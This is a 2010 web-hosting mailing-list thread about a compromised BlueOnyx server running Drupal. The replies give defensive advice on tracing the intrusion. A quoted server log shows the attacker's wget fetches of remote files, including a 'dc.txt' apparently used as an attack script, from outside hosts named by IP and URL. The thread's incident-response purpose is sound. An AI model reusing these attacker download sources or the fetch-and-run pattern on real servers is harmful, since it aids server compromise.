[BlueOnyx:05937] Re: hacker scripts
Ken - Precision Web Hosting, Inc
kenlists at precisionweb.net
Mon Nov 29 12:44:28 -05 2010
----- Original Message -----
From: "Gerald Waugh" <gwaugh at frontstreetnetworks.com>
To: "BlueOnyx General Mailing List" <blueonyx at blueonyx.it>
Sent: Monday, November 29, 2010 9:28 AM
Subject: [BlueOnyx:05934] Re: hacker scripts
>
> On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
>> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
>> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
>> > > How can I stop these people from downloading and running their
>> > > scripts
>> > > in /tmp using httpd
>> >
>> > You need to find out how they did it. You're either hosting someone
>> > naughty, or someone who has an insecure script. Who owns the files?
>> >
>> apache.apache
>>
>> The server has a site with Drupal and some other blog stuff
>>
>
> /tmp type ext3 (rw,noexec,nosuid)
>
>
>
> [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
> exist:
> /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> --06:02:38-- http://193.136.136.86/quixplorer/readme.txt
> => `readme.txt'
> Connecting to 193.136.136.86:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 27,931 (27K) [text/plain]
>
> 0K .......... .......... ....... 100%
> 56.99
> KB/s
>
> 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
>
> --06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt
> => `dc.txt'
> Resolving realezsites.com... 64.235.52.10
> Connecting to realezsites.com|64.235.52.10|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 2,140 (2.1K) [text/plain]
>
> 0K .. 100%
> 2.40
> MB/s
>
> 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
>
> --
> Gerald
>
Look at the time the files in the /tmp were created. Then look in your
access logs and see what site / php script was accessed at that time.
Check your drupal version and search on Google for
"Exploits for Drupal version xxx"
----
Ken M
Precision Web Hosting, Inc.
http://www.precisionweb.net
More information about the Blueonyx
mailing list